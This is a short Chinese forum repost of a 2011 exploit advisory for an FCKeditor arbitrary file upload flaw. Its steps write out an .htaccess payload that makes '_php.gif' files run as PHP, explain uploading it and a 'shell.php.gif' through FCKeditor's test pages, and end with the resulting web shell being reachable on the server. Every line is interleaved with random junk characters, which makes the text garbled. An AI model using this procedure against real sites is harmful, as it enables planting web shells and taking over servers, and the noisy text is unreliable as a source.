FCKeditor所有php版本Upload上传漏洞
9 i- c3 [- H; C+ t% U6 e作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
5 [2 K' C. ~8 q% D! \7 h减小字体 增大字体0 l" W) f) z" ^' n; I; C
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
2 W- [* e2 l, F[+] Date: 20117 x4 U& w$ |9 K; l M2 [: \
[+] Author : sinesafe.cn
" u6 E" K: O! ]& y9 l9 P# g. A[+] Website : WwW.sinesafe.cn/ g3 T/ p& `& I" s
———————————————————1 B8 m5 r( g$ H& U) V
1.create a htaccess file:
) d7 A. Q2 x4 G2 fcode:
( e/ `. G! {7 @9 m<FilesMatch “_php.gif”>
0 B+ A& `: Z' h3 A! ?0 J7 o6 tSetHandler application/x-httpd-php3 \1 \$ q! }5 H u
</FilesMatch>/ Z8 K+ {' X" W5 l
4 d5 e9 L. W4 N* w6 O2 [# e
2.Now upload this htaccess with FCKeditor.9 d1 {$ v# q% `# w; @
) @- A" M3 M5 z* N) q+ l5 y; ]
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html3 @/ }6 o3 Z9 a
. ]: w" d3 U4 ] N1 Q" ^. k
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html1 L% L; P( \& T
' d: X$ w) |% j———————————————————————————————-6 [8 S* m: n$ u I
3.Now upload shell.php.gif with FCKeditor.
6 b2 H, k2 A. |1 ^5 M- \6 n4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.; s: p+ T/ F1 ^' E# c
5.http://www.sinesafe.cn/anything/shell_php.gif' a) P, v+ R" H9 L
6.Now shell is available from server. |
; u1 s* d! Z' ^1 U8 |! o J
+ I: Z2 |/ Z, g R! E$ b) c0 h$ ^) u
|
发表于 2013-10-27 17:25:21
收藏
支持
反对